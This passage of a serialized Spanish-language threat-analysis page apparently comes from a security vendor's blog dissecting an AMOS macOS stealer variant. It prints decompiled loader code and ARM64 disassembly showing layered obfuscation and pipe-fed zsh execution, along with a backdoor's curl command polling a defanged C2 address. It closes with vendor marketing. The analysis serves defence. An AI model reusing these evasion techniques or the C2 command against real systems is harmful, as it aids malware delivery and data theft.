",[102,1149,1150],{"style":564},"0xc0",[102,1152,1065],{"style":538},[102,1154,1155],{"style":528},"// 'C'/'c' → 0xc0",[102,1157,1059],{"style":538},[102,1159,1160],{"style":564},"0x44",[102,1162,1059],{"style":538},[102,1164,1165],{"style":564},"100",": bVar9 = ",[102,1168,1169],{"style":564},"0xd0",[102,1171,1065],{"style":538},[102,1173,1174],{"style":528},"// 'D'/'d' → 0xd0",[102,1176,1059],{"style":538},[102,1178,1179],{"style":564},"0x45",[102,1181,1059],{"style":538},[102,1183,1184],{"style":564},"0x65",[102,1186,1187],{"style":564},"0xe0",[102,1189,1065],{"style":538},[102,1191,1192],{"style":528},"// 'E'/'e' → 0xe0",[102,1194,1059],{"style":538},[102,1196,1029],{"style":564},[102,1198,1059],{"style":538},[102,1200,1035],{"style":564},[102,1202,1203],{"style":564},"0xf0",[102,1205,1065],{"style":538},[102,1207,1208],{"style":528},"// 'F'/'f' → 0xf0","\n}\n",[102,1211,1212],{"style":528},"// Second nibble from lookup table at DAT_1007bb591",[102,1214,1215],{"style":538},"byte",[102,1217,756],{"style":538},")pppppppuVar3 + uVar8) =\n (&DAT_1007bb591)[(",[102,1220,581],{"style":538},")uVar4 & ",[102,1223,1224],{"style":564},"0xff","] | bVar9;\n",[12,1227,1228],{},"El ensamblado ARM64 gestiona esto con una segunda tabla de salto calculado, implementando efectivamente una tabla de salto de 55 entradas para el switch:",[52,1230,1231],{"style":54},[56,1232,1235],{"className":1233,"code":1234,"language":61},[59],"100000e5c: adr x17,0x100000e6c ; base of case-dispatch table\n100000e60: ldrb w0,[x12, x16, LSL ] ; load offset for this hex char\n100000e64: add x17,x17,x0, LSL #0x2 ; compute dispatch address\n100000e68: br x17 ; jump — second computed branch in 24 bytes\n",[63,1236,1234],{"__ignoreMap":65},[12,1238,1239],{},"Dos saltos calculados en una ventana de 24 bytes. Las herramientas de análisis estático tienen serias dificultades con este patrón porque ambos destinos son desconocidos en tiempo de análisis.",[12,1241,1242],{},"Una cadena hexadecimal de 137.208 caracteres se decodifica en 68.604 bytes. Estos 68.604 bytes alimentan a continuación la Capa 3.",[22,1244],{},[186,1246,1248],{"id":1247},"capa-3-alfabeto-de-nibbles-personalizado-de-16-símbolos","Capa 3: alfabeto de nibbles personalizado de 16 símbolos",[12,1250,192],{},[12,1252,1253],{},"Los 68.604 bytes de salida de la Capa 2 utilizan únicamente 16 valores de byte únicos, extraídos de dos rangos ASCII no contiguos:",[1255,1256,1257,1306],"ul",{},[1258,1259,1260,1263,1264,805,1267,805,1270,805,1273,805,1276,805,1279,805,1282,805,1285,805,1287,805,1290,805,1293,805,1296,805,1299,805,1301,805,1303],"li",{},[63,1261,1262],{},"0x20-0x2F",": espacio, ",[63,1265,1266],{},"!",[63,1268,1269],{},"\"",[63,1271,1272],{},"#",[63,1274,1275],{},"$",[63,1277,1278],{},"%",[63,1280,1281],{},"&",[63,1283,1284],{},"'",[63,1286,545],{},[63,1288,1289],{},")",[63,1291,1292],{},"*",[63,1294,1295],{},"+",[63,1297,1298],{},",",[63,1300,873],{},[63,1302,1014],{},[63,1304,1305],{},"/",[1258,1307,1308,1062,1311,805,1314,805,1317,805,1320,805,1323,805,1326,805,1329,1332],{},[63,1309,1310],{},"0x78-0x7F",[63,1312,1313],{},"x",[63,1315,1316],{},"y",[63,1318,1319],{},"z",[63,1321,1322],{},"{",[63,1324,1325],{},"|",[63,1327,1328],{},"}",[63,1330,1331],{},"~",", DEL",[12,1334,1335],{},"Esta es una elección deliberada. En un editor hexadecimal, estos bytes parecen espacios en blanco, puntuación y caracteres al final del rango ASCII, de modo que se camuflan como si fueran metadatos o relleno, no datos codificados. Un analista humano que haga un escaneo visual rápido de un volcado hexadecimal no marcará estos rangos de bytes como sospechosos. El análisis de entropía estándar también subestimará la entropía efectiva porque la distribución de bytes parece no aleatoria.",[12,1337,1338,1339,1342,1343,1346,1347,1350,1351,1354],{},"Cada byte de este alfabeto codifica un nibble del payload real. El mapeo alfabeto-nibble lo aplica la función de codificación y decodificación ",[63,1340,1341],{},"FUN_100000d60",", que confirmamos en ",[63,1344,1345],{},"0x100000d60",". Encadena dos subfunciones: ",[63,1348,1349],{},"FUN_100000b50"," construye un mapa indexado de los caracteres de la cadena de entrada, y ",[63,1352,1353],{},"FUN_100000c34"," recorre este mapa consumiendo 6 bits por paso y acumulando bytes de salida de 8 bits:",[52,1356,1357],{"style":54},[524,1358,1359,1362,1363,1365,1366,1368,1369,1371,1372,1375,1376,420,1379,1381,1382,1384,1385,424,1388,1390,1391,1394,1395,1397,1398,424,1401,1403,1404,1407,1408,1411,1412,1414,1415,1418,1419,1421,1422,578,1425,1427,1428,1430,1431,1433],{},[102,1360,1361],{"style":528},"// FUN_100000c34 @ 0x100000c34, nibble accumulator","\niVar5 = ",[102,1364,808],{"style":564},";\n",[102,1367,828],{"style":538}," {\n local_52 = *(",[102,1370,1053],{"style":538}," *)puVar4;\n lVar3 = ",[102,1373,1374],{"style":543},"FUN_1000a078c","(param_3, &local_52); ",[102,1377,1378],{"style":528},"// look up nibble value",[102,1380,835],{"style":538}," (lVar3 == ",[102,1383,808],{"style":564},") {\n ",[102,1386,1387],{"style":528},"// character not in alphabet, treat as raw",[102,1389,1374],{"style":543},"(param_3, &local_51);\n } ",[102,1392,1393],{"style":538},"else"," {\n iVar5 = iVar5 + ",[102,1396,585],{"style":564},"; ",[102,1399,1400],{"style":528},"// accumulate 4 bits",[102,1402,912],{"style":538}," (",[102,1405,1406],{"style":564},"7"," \u003C iVar5) {\n std::string::",[102,1409,1410],{"style":543},"push_back","((",[102,1413,843],{"style":538},")param_1); ",[102,1416,1417],{"style":528},"// emit byte when 8+ bits ready","\n iVar5 = iVar5 + -",[102,1420,824],{"style":564},";\n }\n }\n puVar4 = (",[102,1423,1424],{"style":538},"undefined8",[102,1426,756],{"style":538},")puVar4 + ",[102,1429,839],{"style":564},");\n} ",[102,1432,912],{"style":538}," (puVar4 != puVar1);\n",[12,1435,1436],{},"Los 34.302 bytes que emergen de esta pasada son ASCII imprimible en un 99,7% de los casos; el payload en esta etapa parece, a una inspección superficial, un script de shell extenso o un blob de configuración.",[22,1438],{},[186,1440,1442],{"id":1441},"capa-4-ofuscación-de-cadenas-en-tiempo-de-compilación","Capa 4: ofuscación de cadenas en tiempo de compilación",[12,1444,192],{},[12,1446,1447],{},"Las cadenas cortas de uso interno están ofuscadas en tiempo de compilación empleando el mismo esquema de tripletes que la Capa 1. Estas cadenas se reconstruyen en tiempo de ejecución inmediatamente antes de su uso y nunca persisten en memoria: son consumidas por la siguiente operación y el buffer se libera a continuación. En ningún momento es visible una cadena decodificada en las secciones de datos estáticos del binario.",[12,1449,1450,1451,1454],{},"La función de hash de cadenas ",[63,1452,1453],{},"FUN_100000730"," proporciona una capa de ofuscación secundaria para las comparaciones de cadenas. En lugar de comparar cadenas directamente, lo que dejaría texto plano en memoria susceptible de reconocimiento por patrones, el binario calcula y compara hashes enteros:",[52,1456,1457],{"style":54},[524,1458,1459,1462,1465,540,1467,545,1469,757,1471,1473,1474,1477,1478,420,1481,420,1484,1487,1488,1490,1491,1493,1494,1496,1497,1115,1500,1503,1504,1506,1507,1509],{},[102,1460,1461],{"style":528},"// FUN_100000730 @ 0x100000730",[102,1463,1464],{"style":528},"// FNV-style string hash, avoids plaintext string comparisons",[102,1466,551],{"style":538},[102,1468,1453],{"style":543},[102,1470,843],{"style":538},[102,1472,551],{"style":538}," iVar4 = ",[102,1475,1476],{"style":564},"0x19a8","; ",[102,1479,1480],{"style":528},"// FNV offset basis (modified)",[102,1482,1483],{"style":528},"// ...",[102,1485,1486],{"style":538},"for"," (; uVar3 != ",[102,1489,808],{"style":564},"; uVar3 = uVar3 - ",[102,1492,839],{"style":564},") {\n iVar4 = (",[102,1495,551],{"style":538},")*pcVar1 + iVar4 * -",[102,1498,1499],{"style":564},"0x7fb91be3",[102,1501,1502],{"style":528},"// FNV-1a style multiply","\n pcVar1 = pcVar1 + ",[102,1505,839],{"style":564},";\n }\n ",[102,1508,593],{"style":538}," iVar4;\n}\n",[12,1511,1512],{},"La implementación ARM64 reemplaza la multiplicación con un multiply-add fusionado:",[52,1514,1515],{"style":54},[56,1516,1519],{"className":1517,"code":1518,"language":61},[59],"100000744: mov w0,#0x19a8 ; FNV basis\n100000750: mov w10,#0xe41d\n100000754: movk w10,#0x8046, LSL #16 ; constant = 0x8046e41d = -0x7fb91be3\n100000758: ldrsb w11,[x8], #0x1 ; load char, post-increment\n10000075c: madd w0,w0,w10,w11 ; w0 = w0 * 0x8046e41d + char\n100000760: subs x9,x9,#0x1\n100000764: b.ne 0x100000758\n",[63,1520,1518],{"__ignoreMap":65},[12,1522,1523],{},"Esto significa que incluso comparar dos cadenas dentro del binario nunca produce un salto que un depurador pueda interceptar limpiamente a nivel de cadena, sino solo a nivel de hash.",[22,1525],{},[186,1527,1529],{"id":1528},"capa-5-cifrado-de-flujo-personalizado-con-doble-instancia","Capa 5: cifrado de flujo personalizado con doble instancia",[12,1531,192],{},[12,1533,1534,1535,1538],{},"Aquí es donde la arquitectura de ofuscación se vuelve genuinamente inusual. No hay una sino ",[251,1536,1537],{},"dos instancias de cifrado separadas"," en el binario, cada una con una tabla de búsqueda codificada distinta y un contador de inicio diferente. Ambas utilizan la misma estructura de algoritmo, pero producen alfabetos de salida diferentes para distintas partes del pipeline del payload.",[12,1540,1541,1544,1545,718,1548,1551],{},[251,1542,1543],{},"Instancia A"," — ",[63,1546,1547],{},"FUN_10007ab34",[63,1549,1550],{},"0x10007ab34",":",[52,1553,1554],{"style":54},[524,1555,1556,1559,1560,1365,1563,1565,1566,578,1568,1570,1571,1573,1574,578,1576,1578,1579,1581,1582,578,1584,1586,1587,1589,1590,1593,1594,1596,1597,1599],{},[102,1557,1558],{"style":528},"// Instance A, start counter 0x4c, table @ 0x100496f8b","\nuVar6 = ",[102,1561,1562],{"style":564},"0x4c",[102,1564,828],{"style":538}," {\n bVar2 = *(",[102,1567,1215],{"style":538},[102,1569,756],{"style":538},")local_e0 +\n ((",[102,1572,581],{"style":538},")(*(",[102,1575,1215],{"style":538},[102,1577,756],{"style":538},")local_c8 + uVar5) ^ uVar6) & ",[102,1580,1224],{"style":564},"));\n *(",[102,1583,1215],{"style":538},[102,1585,756],{"style":538},")plVar1 + uVar5) = bVar2;\n uVar6 = (",[102,1588,551],{"style":538},")uVar5 + (uVar6 ^ bVar2); ",[102,1591,1592],{"style":528},"// counter: i + (counter XOR output)","\n uVar5 = uVar5 + ",[102,1595,839],{"style":564},";\n} ",[102,1598,912],{"style":538}," (uVar7 != uVar5);\n",[12,1601,1602,805,1605,718,1608,1551],{},[251,1603,1604],{},"Instancia B",[63,1606,1607],{},"FUN_10007a7e0",[63,1609,1610],{},"0x10007a7e0",[52,1612,1613],{"style":54},[524,1614,1615,1559,1618,1365,1621,1565,1623,578,1625,1627,1628,1573,1630,578,1632,1634,1635,1581,1637,578,1639,1586,1641,1589,1643,1593,1646,1596,1648,1599],{},[102,1616,1617],{"style":528},"// Instance B, start counter 0x9f, different table @ 0x100496e0a region",[102,1619,1620],{"style":564},"0x9f",[102,1622,828],{"style":538},[102,1624,1215],{"style":538},[102,1626,756],{"style":538},")local_c0 +\n ((",[102,1629,581],{"style":538},[102,1631,1215],{"style":538},[102,1633,756],{"style":538},")local_a8 + uVar5) ^ uVar6) & ",[102,1636,1224],{"style":564},[102,1638,1215],{"style":538},[102,1640,756],{"style":538},[102,1642,551],{"style":538},[102,1644,1645],{"style":528},"// identical counter update formula",[102,1647,839],{"style":564},[102,1649,912],{"style":538},[12,1651,1652,1653,1655,1656,1658],{},"El algoritmo es estructuralmente idéntico, pero el contador de inicio difiere (",[63,1654,1562],{}," frente a ",[63,1657,1620],{},") y las tablas de búsqueda están en diferentes direcciones de memoria. La Instancia A se invoca desde el estado 11 de la máquina de estados para producir el alfabeto de codificación del primer path de payload. La Instancia B se invoca desde el estado 6 para producir el alfabeto de decodificación del payload del script de shell extenso.",[12,1660,1661,1662,1665,1666,1669,1670,1673],{},"Para ser precisos sobre lo que es este cifrado: es un ",[251,1663,1664],{},"cifrado de sustitución con índice dependiente del contador",". Cada byte de salida es una búsqueda en tabla donde el índice es ",[63,1667,1668],{},"(input_byte XOR counter) & 0xFF",". El contador se actualiza como ",[63,1671,1672],{},"counter = (i + (counter XOR output)) & 0xFF"," tras cada byte, lo que significa que cada byte de salida retroalimenta la determinación del siguiente índice de búsqueda. Esto crea una cadena de dependencia a lo largo de toda la secuencia de salida: no es posible descifrar el byte N sin haber descifrado correctamente los bytes del 0 al N-1. Esta propiedad hace significativamente más difícil el descifrado parcial o el análisis de fallos.",[12,1675,1676],{},"Ninguna instancia es RC4 estándar. No hay una fase de inicialización del S-Box ni una operación de intercambio del S-Box. Las tablas de búsqueda son constantes estáticas precomputadas e integradas en el binario en tiempo de compilación.",[22,1678],{},[186,1680,1682],{"id":1681},"capa-6-xor-en-tiempo-de-ejecución-con-clave-dependiente-del-código-de-salida","Capa 6: XOR en tiempo de ejecución con clave dependiente del código de salida",[12,1684,192],{},[12,1686,1687,1688,1691],{},"La capa final y analíticamente más difícil de superar aplica una transformación XOR en memoria al payload de la Etapa 2. La clave XOR no está codificada en el binario. Se computa en tiempo de ejecución a partir del código de salida de la ",[251,1689,1690],{},"primera ejecución del payload de shell",", lo que significa que no puede determinarse mediante ningún tipo de análisis estático. El binario debe ejecutarse realmente, el primer script de shell debe ejecutarse hasta completarse, y solo entonces existe la clave.",[12,1693,1694],{},"La secuencia de derivación de clave en el despachador de la máquina de estados ARM64:",[52,1696,1697],{"style":54},[56,1698,1701],{"className":1699,"code":1700,"language":61},[59],"; After shell_exec_via_pipe #1 returns, exit code is in w0\n10009f838: ubfx w8,w0,#0x8,#0x8 ; extract bits [15:8] of exit status\n10009f83c: mov w9,#0x7f0 ; multiplier constant\n10009f840: madd w8,w8,w9,w26 ; key = (exit_byte × 0x7f0) + base_counter\n10009f844: and w24,w8,#0xffff ; mask to 16-bit key → stored in w24\n",[63,1702,1700],{"__ignoreMap":65},[12,1704,1705],{},"El bucle XOR que procesa el payload de la Etapa 2:",[52,1707,1708],{"style":54},[56,1709,1712],{"className":1710,"code":1711,"language":61},[59],"; In-place XOR, every byte of the payload is XORed with w24\n10009fc34: ldrb w10,[x8, x9, LSL ] ; load payload byte\n10009fc48: eor w10,w10,w24 ; XOR with key\n10009fc4c: strb w10,[x8, x9, LSL ] ; write decrypted byte in place\n",[63,1713,1711],{"__ignoreMap":65},[12,1715,1716,1717,1720,1721,1724,1725,1727],{},"La clave es un valor de 16 bits derivado del byte de estado de salida del primer payload de shell, multiplicado por ",[63,1718,1719],{},"0x7f0"," y sumado al valor actual del registro contador base de la máquina de estados ",[63,1722,1723],{},"w26",". La constante multiplicativa ",[63,1726,1719],{}," implica que incluso una diferencia de un solo bit en el código de salida produce una clave completamente diferente: no existe ninguna continuidad explotable entre valores de clave adyacentes.",[12,1729,1730],{},"Sin ejecutar el binario en un entorno controlado y capturar el código de salida exacto del primer payload de shell, el payload de la Etapa 2 es permanentemente opaco al análisis estático. Esta fue la barrera más difícil que encontramos en todo el análisis.",[22,1732],{},[41,1734,1736],{"id":1735},"ejecución-de-shell-pipes-en-lugar-de-argumentos-y-xor-simd","Ejecución de shell: pipes en lugar de argumentos, y XOR SIMD",[12,1738,47],{},[12,1740,1741,1742,718,1745,1748],{},"La función de ejecución de shell ",[63,1743,1744],{},"FUN_10000091c",[63,1746,1747],{},"0x10000091c"," es la pieza arquitectónicamente más interesante del binario. Es donde todo converge: el payload decodificado, el nombre del comando ofuscado y el diseño antiforense deliberado. Cada decisión de diseño individual en esta función es intencional y sirve a un propósito específico de evasión.",[186,1750,1752],{"id":1751},"paso-1-el-nombre-del-comando-nunca-está-en-texto-plano","Paso 1: el nombre del comando nunca está en texto plano",[12,1754,192],{},[12,1756,1757,1758,1761,1762,718,1765,1768,1769,1772],{},"La cadena ",[63,1759,1760],{},"/bin/zsh"," no existe en ningún lugar del binario. Está almacenada en la sección ",[63,1763,1764],{},"__cstring",[63,1766,1767],{},"0x1007bb5c8"," como los bytes ofuscados ",[63,1770,1771],{},"\\x01LG@\\x01T]F",". La decodificación ocurre en tiempo de ejecución mediante una única operación XOR, confirmada directamente en el ensamblado ARM64:",[52,1774,1775],{"style":54},[56,1776,1779],{"className":1777,"code":1778,"language":61},[59],"; FUN_10000091c — command name decode via SIMD XOR\n100000960: adrp x8,0x1007bb000\n100000964: add x8,x8,#0x5c8 ; x8 → \"\\x01LG@\\x01T]F\" in __cstring\n100000968: ldr x8,[x8] ; load 8 obfuscated bytes as uint64\n10000096c: str x8,[sp, #0x20]\n100000970: strb wzr,[sp, #0x28] ; null terminator\n\n100000974: ldr d0,[sp, #0x20] ; load into SIMD register d0\n100000978: movi v1.8B,#0x2e ; broadcast 0x2e to all 8 lanes of v1\n10000097c: eor v0.8B,v0.8B,v1.8B ; XOR all 8 bytes simultaneously\n100000980: str d0,[sp, #0x20] ; store decoded \"/bin/zsh\"\n\n100000988: mov w8,#0x732d ; 0x732d = \"-s\" (little-endian)\n10000098c: strh w8,[sp, #0x4] ; store argument string\n",[63,1780,1778],{"__ignoreMap":65},[12,1782,1783,1784,1787,1788,1790,1791,1794],{},"La clave XOR es ",[63,1785,1786],{},"0x2e",", el valor ASCII de ",[63,1789,1014],{}," (punto). La decodificación se realiza en un único ",[63,1792,1793],{},"eor v0.8B, v0.8B, v1.8B",", una instrucción vectorial ARM64 NEON que aplica XOR a los 8 bytes de la cadena simultáneamente. Usar una instrucción SIMD para una decodificación simple de 8 bytes es inusual y cumple dos propósitos: es más rápido que un bucle byte a byte, y genera un patrón de instrucciones fundamentalmente diferente que las herramientas de coincidencia de firmas entrenadas en bucles de decodificación escalares no detectarán.",[12,1796,1797,1798,805,1801,805,1804,805,1807,1810,1811,1814],{},"La verificación es trivial: ",[63,1799,1800],{},"0x01 XOR 0x2e = 0x2f = /",[63,1802,1803],{},"0x4c XOR 0x2e = 0x62 = b",[63,1805,1806],{},"0x47 XOR 0x2e = 0x69 = i",[63,1808,1809],{},"0x40 XOR 0x2e = 0x6e = n",", lo que produce ",[63,1812,1813],{},"/bin"," en los primeros cuatro bytes.",[186,1816,1818],{"id":1817},"paso-2-la-arquitectura-de-pipes","Paso 2: la arquitectura de pipes",[12,1820,192],{},[12,1822,1823],{},"Tras decodificar el nombre del comando, la función crea un pipe del sistema operativo y hace un fork:",[52,1825,1826],{"style":54},[56,1827,1830],{"className":1828,"code":1829,"language":61},[59],"100000990: bl 0x1000a0f6c ; _fork()\n100000994: mov x20,x0 ; save PID\n100000998: cbz w0,0x100000b00 ; if child: jump to exec path\n",[63,1831,1829],{"__ignoreMap":65},[12,1833,1834],{},"En el proceso hijo:",[52,1836,1837],{"style":54},[56,1838,1841],{"className":1839,"code":1840,"language":61},[59],"; Child process path\n100000b0c: mov w1,#0x0\n100000b10: bl 0x1000a0f48 ; _dup2(pipe_read_fd, STDIN=0)\n; pipe read-end is now stdin, shell reads from pipe\n100000b2c: add x0,sp,#0x20 ; argv[0] = \"/bin/zsh\"\n100000b30: add x1,sp,#0x8 ; argv array\n100000b34: bl 0x1000a0f60 ; _execvp(\"/bin/zsh\", [\"/bin/zsh\", \"-s\", NULL])\n",[63,1842,1840],{"__ignoreMap":65},[12,1844,1845,1846,1849,1850,1853,1854,1856],{},"El proceso hijo reemplaza su entrada estándar con el extremo de lectura del pipe y luego ejecuta ",[63,1847,1848],{},"/bin/zsh -s",". El shell en modo ",[63,1851,1852],{},"-s"," lee comandos desde stdin. Desde el punto de vista de la monitorización de procesos, este proceso aparece como ",[63,1855,1848],{}," sin argumentos, lo que es indistinguible de una sesión de shell interactiva legítima.",[186,1858,1860],{"id":1859},"paso-3-escrituras-en-fragmentos-de-tamaño-variable","Paso 3: escrituras en fragmentos de tamaño variable",[12,1862,192],{},[12,1864,1865],{},"El proceso padre escribe el payload descifrado en el extremo de escritura del pipe en fragmentos de tamaño deliberadamente variable:",[52,1867,1868],{"style":54},[56,1869,1872],{"className":1870,"code":1871,"language":61},[59],"; Parent: compute chunk size then write\n1000009d4: umulh x8,x23,x24 ; high-half multiply for modulo\n1000009d8: lsr x8,x8,#0x7\n1000009dc: msub x8,x8,x25,x23 ; x8 = length % 0xc0\n1000009e0: add x8,x8,#0x40 ; chunk = (length % 192) + 64\n ; range: 64 to 255 bytes per write\n1000009e4: cmp x8,x23 ; clamp to remaining length\n1000009e8: csel x2,x8,x23,cc\n\n1000009ec: ldr w0,[sp, #0x34] ; pipe write fd\n1000009f0: mov x1,x21 ; payload pointer\n1000009f4: bl 0x1000a0fc0 ; _write(fd, buf, chunk_size)\n\n100000a04: mov w0,#0x1\n100000a08: bl 0x1000a0fa8 ; _usleep(1), 1µs between chunks\n100000a0c: add x21,x21,x22 ; advance pointer\n100000a10: sub x23,x23,x22 ; reduce remaining count\n100000a14: cbnz x23,0x1000009d4 ; loop until done\n",[63,1873,1871],{"__ignoreMap":65},[12,1875,1876,1877,1880,1881,1884,1885,1888,1889,1014],{},"La fórmula de tamaño de fragmento ",[63,1878,1879],{},"(remaining_length % 192) + 64"," produce valores de entre 64 y 255 bytes por llamada de escritura, variando en función de la longitud restante del payload. Este enfoque de fragmentación variable significa que el patrón de escritura, visible en herramientas de rastreo de eventos del kernel como ",[63,1882,1883],{},"ktrace"," o ",[63,1886,1887],{},"dtrace",", no produce una firma de tamaño fijo reconocible. Cada ejecución del mismo payload produce una secuencia diferente de tamaños de llamada ",[63,1890,1891],{},"write()",[12,1893,963,1894,1896],{},[63,1895,600],{}," de 1 microsegundo entre fragmentos cumple un propósito secundario: cede la CPU entre escrituras, manteniendo el uso de CPU del proceso constante y evitando un pico repentino que una regla EDR de comportamiento podría marcar como I/O en ráfaga anómala.",[186,1898,1900],{"id":1899},"paso-4-borrado-inmediato-de-memoria","Paso 4: borrado inmediato de memoria",[12,1902,192],{},[52,1904,1905],{"style":54},[56,1906,1909],{"className":1907,"code":1908,"language":61},[59],"; After all chunks written and pipe closed:\n100000a20: ldrb w8,[x19, #0x17] ; check string storage type\n100000a24: sxtb w9,w8\n100000a28: ldp x10,x11,[x19]\n100000a30: csel x0,x10,x19,lt ; pointer to payload buffer\n100000a34: csel x1,x11,x8,lt ; length of buffer\n100000a38: bl 0x1000a0f30 ; _bzero(payload_buf, length)\n",[63,1910,1908],{"__ignoreMap":65},[12,1912,1913,1914,1917],{},"La llamada ",[63,1915,1916],{},"_bzero()"," pone a cero el buffer completo del payload descifrado inmediatamente después de que el último byte ha sido escrito en el pipe. No existe ningún momento, ni siquiera un microsegundo, en que el payload descifrado permanezca en memoria una vez completada la ejecución. Un volcado de memoria en vivo tomado en el instante posterior a que esta función retorne solo encontrará ceros donde estaba el payload.",[12,1919,1920,1921,1924],{},"Esta técnica se denomina ",[251,1922,1923],{},"zero-after-use"," y es la misma que utilizan las bibliotecas criptográficas de alta seguridad para evitar que el material de clave secreta persista en memoria. Verla en malware de uso general es inusual e indica un desarrollador con formación en ingeniería de seguridad.",[186,1926,1928],{"id":1927},"la-secuencia-de-ejecución-completa","La secuencia de ejecución completa:",[12,1930,192],{},[52,1932,1933],{"style":54},[56,1934,1937],{"className":1935,"code":1936,"language":61},[59],"__cstring: \"\\x01LG@\\x01T]F\" (7 bytes, obfuscated)\n ↓ SIMD XOR with 0x2e (8-wide vector)\nstack: \"/bin/zsh\\0\" (decoded in-place, stack only)\n ↓ _pipe() creates fd pair [read=local_60, write=local_5c]\n ↓ _fork()\n │\n ├─ CHILD: _dup2(local_60, 0) stdin = pipe read end\n │ _execvp(\"/bin/zsh\", [\"/bin/zsh\", \"-s\", NULL])\n │ → /bin/zsh reads commands from stdin (= pipe)\n │\n └─ PARENT: loop: _write(local_5c, payload, variable_chunk)\n _usleep(1)\n _close(local_5c) close write end → EOF to shell\n _bzero(payload, len) ← WIPE IMMEDIATELY\n _waitpid(child, ...)\n",[63,1938,1936],{"__ignoreMap":65},[41,1940,1942],{"id":1941},"la-tabla-de-importaciones-como-arma","La tabla de importaciones como arma",[12,1944,47],{},[12,1946,1947],{},"La tabla de importaciones completa de este binario es:",[52,1949,1950],{"style":54},[56,1951,1954],{"className":1952,"code":1953,"language":61},[59],"// C runtime / memory\n_memcpy _memmove _memset _bzero\n\n// Process execution\n_fork _execvp _execl __exit\n\n// IPC / pipes\n_pipe _dup2 _close _write\n\n// Synchronisation\n_waitpid _usleep\n\n// Stack protection\n___stack_chk_fail ___stack_chk_guard\n\n// C++ runtime\noperator.new operator.delete __Unwind_Resume\n___cxa_allocate_exception ___cxa_throw ___cxa_begin_catch\n___cxa_end_catch ___cxa_free_exception ___gxx_personality_v0\nterminate logic_error bad_array_new_length __next_prime\n\n// STL containers\nappend reserve push_back operator=\n\n// Dynamic linking\ndyld_stub_binder\n",[63,1955,1953],{"__ignoreMap":65},[12,1957,1958],{},"El recuento total de importaciones es de 27 símbolos. Lo que falta es tan significativo como lo que está presente.",[186,1960,1962],{"id":1961},"ausente-red","Ausente: red",[12,1964,192],{},[52,1966,1967],{"style":54},[56,1968,1971],{"className":1969,"code":1970,"language":61},[59],"socket connect bind listen\naccept send recv sendto\nrecvfrom getaddrinfo gethostbyname\n",[63,1972,1970],{"__ignoreMap":65},[186,1974,1976],{"id":1975},"ausente-sistema-de-archivos","Ausente: sistema de archivos",[12,1978,192],{},[52,1980,1981],{"style":54},[56,1982,1985],{"className":1983,"code":1984,"language":61},[59],"open read fopen fread\nfwrite fclose stat unlink\nmkdir rename opendir readdir\n",[63,1986,1984],{"__ignoreMap":65},[186,1988,1990],{"id":1989},"ausente-introspección-de-procesos","Ausente: introspección de procesos",[12,1992,192],{},[52,1994,1995],{"style":54},[56,1996,1999],{"className":1997,"code":1998,"language":61},[59],"getpid getuid getenv sysctl\n",[63,2000,1998],{"__ignoreMap":65},[186,2002,2004],{"id":2003},"ausente-criptografía","Ausente: criptografía",[12,2006,47],{},[52,2008,2009],{"style":54},[56,2010,2013],{"className":2011,"code":2012,"language":61},[59],"CCCrypt SecItemAdd SecKeychainFind\n",[63,2014,2012],{"__ignoreMap":65},[12,2016,2017,2018,805,2021,2024,2025,805,2028,2031,2032,2035],{},"En una muestra de malware tradicional, se esperan importaciones para networking (",[63,2019,2020],{},"socket",[63,2022,2023],{},"connect",") o manipulación de archivos (",[63,2026,2027],{},"fopen",[63,2029,2030],{},"write","). Este binario no tiene ",[251,2033,2034],{},"ninguna",". Para un escáner estándar, este binario parece un lanzador de procesos inofensivo. Esta es una decisión arquitectónica deliberada para eludir las herramientas de análisis estático que marcan el uso sospechoso de APIs.",[12,2037,399,2038,2040],{},[63,2039,402],{}," no realiza el robo por sí mismo. Su único propósito es depositar y ejecutar el payload malicioso real: un AppleScript fuertemente ofuscado. Un EDR o AV independiente que busque \"binarios maliciosos\" verá un loader sin capacidades de red ni I/O de archivos y potencialmente le otorgará un veredicto de \"limpio\". Perderá de vista que el binario es un sistema de entrega especializado para un payload de script de alto nivel.",[22,2042],{},[25,2044,2046],{"id":2045},"la-puerta-trasera","La puerta trasera",[12,2048,31],{},[12,2050,2051,2052,2055],{},"El incidente no terminó tras el compromiso inicial. La telemetría de Microsoft Defender mostró un proceso ejecutándose desde ",[63,2053,2054],{},"/Users/\u003Credacted>/.mainhelper",", consultando periódicamente un servidor externo:",[52,2057,2058],{"style":54},[56,2059,2061],{"className":262,"code":2060,"language":264,"meta":65,"style":65},"sh -c \"curl -s 'http[:]//45.94.47[.]204/api/tasks/*********************'\"\n",[63,2062,2063],{"__ignoreMap":65},[102,2064,2065,2068,2070],{"class":104,"line":105},[102,2066,2067],{"class":271},"sh",[102,2069,276],{"class":275},[102,2071,2072],{"class":289}," \"curl -s 'http[:]//45.94.47[.]204/api/tasks/*********************'\"\n",[12,2074,2075],{},"La cadena Base64 se decodifica en un UUID de dispositivo de 16 bytes, el identificador único asignado a esta máquina por la infraestructura C2 del atacante el día de la infección inicial.",[12,2077,399,2078,2081,2082,2085,2086,2088],{},[63,2079,2080],{},".mainhelper"," (SHA-256: ",[63,2083,2084],{},"7c6766e2b05dfbb286a1ba48ff3e766d4507254e217e8cb77343569153d63063",") había sido instalado por el dropper de osascript mediante ",[63,2087,272],{}," el día del incidente.",[22,2090],{},[25,2092,2094],{"id":2093},"el-poder-del-escudo-colectivo-nuestra-plataforma-exclusiva-de-shared-threat-intelligence","El poder del escudo colectivo: nuestra plataforma exclusiva de Shared Threat Intelligence",[12,2096,31],{},[12,2098,2099],{},"Cuando se activa una alerta en nuestro SOC, el reloj no empieza solo para el cliente afectado, sino para cada organización bajo el escudo de glueckkanja. Esta investigación sobre una variante de AMOS no documentada pone de manifiesto la naturaleza crítica de la brecha de inteligencia: esa peligrosa ventana en la que los proveedores tradicionales están ciegos porque todavía no han visto la amenaza.",[12,2101,2102],{},"Aquí es donde nuestra plataforma de Shared Threat Intelligence, desarrollada exclusivamente para nuestros clientes del CSOC de glueckkanja, demuestra su valor decisivo. No esperamos las actualizaciones del sector, las creamos nosotros. Mientras nuestros analistas seguían desmantelando las últimas capas del ensamblado ARM64, nuestro Motor de Orquestación Automatizada ya estaba distribuyendo los indicadores extraídos por todo nuestro ecosistema. Esto crea un efecto inmediato de inmunidad colectiva, donde un descubrimiento en un único endpoint se convierte en una amenaza bloqueada para cada organización que protegemos en cuestión de minutos.",[12,2104,2105],{},"La seguridad reactiva es una reliquia del pasado cuando se enfrentan amenazas diseñadas para colarse por las grietas de las defensas convencionales. La respuesta reside en combinar la experiencia humana con una arquitectura capaz de desplegar ese conocimiento de forma instantánea y a escala. Cuando estos conocimientos se canalizan a través de nuestro modelo de inteligencia compartida, la ventaja 